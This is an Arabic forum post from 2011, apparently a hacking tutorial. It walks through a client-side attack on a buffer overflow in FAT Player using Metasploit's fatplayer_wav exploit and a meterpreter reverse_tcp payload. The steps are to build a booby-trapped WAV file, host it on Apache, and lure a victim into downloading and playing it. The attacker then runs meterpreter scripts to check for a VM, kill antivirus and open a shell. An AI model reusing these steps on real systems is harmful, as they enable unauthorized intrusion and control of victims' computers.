عرض مشاركة واحدة
قديم 07-15-2011, 03:37 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
spid3rnet
 
الصورة الرمزية spid3rnet
 

 

 
إحصائية العضو







spid3rnet غير متواجد حالياً

إرسال رسالة عبر MSN إلى spid3rnet

 

 

إحصائية الترشيح

عدد النقاط : 10
spid3rnet is on a distinguished road

افتراضي fatplayer hide side client attack


هده طريقة لإختراق الحواسيب عن طريق ترغرة ال Buffer overviewالمتواجدة في ال
FAT player

لرؤية الشرح بالصورة و الصوت مباشرة هنا

http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533

للتحميل الشرح هنا

http://blip.tv/file/get/Jac0bn3t-met...verview350.mp4

كن سخيا و إ قرأ هدا الموضوع

ما قمت باستخدامه :

Metasploit

OS:backtrack 5 and Win SP3

Camtasia studio recorder and editor

Fat player

الشرح:

قمت بإعداد PAYLOAD

على صيغة .WAV

exploit:
windows/fileformat/fatplayer_wav
PAYLOAD :windows/meterpreter/reverse_tcp



كيف قمنا بصنع ال PAYLOAD

الشرح في الفيديو من الدقيقة 1:00 إلى 2:15

تم وضعناها أى ال PAYLOADفي /root/backdoor.wav

حملنا fatplayer 0.6bالمتغورة بال Buffer Overview

ووضعناها أيضا في ال /root/fatplayer_win32

بعد دالك قمنا بتغير أسماء

FAYplayer_win32=====>fatplayer.exe
backdoor.wav=======>playme.wav

حولناهم من / rootإلى /var/www

سوف تتسألون لمادا الى /var/www

لكي تصبح قابلة للتحميل من اي حاسوب

بعد فتح ال بورت 80 عن تطريق ال

service apache2 start

ارسلت للضحية رسالة فيها رابط
168.192.*.*/fatplayer.exe
و
168.192.*.*/playme.wav

بعد قراءة الضحية للرسالة و تحميل fatplayer.exe and playme.wav

و تشعيل الموسيقا سوف احصل على meterpreter

و سأبدأ ببعض Meterpreter scripting

run checkvm للمعرفة هل هو System وهمي

run killavللقتل عمل ال antivirus

تم shell-i للحصول على CMD or bash

الموسيقا :savage garder

animal song

santa monica



fatplayer hide side client attack

   

رد مع اقتباس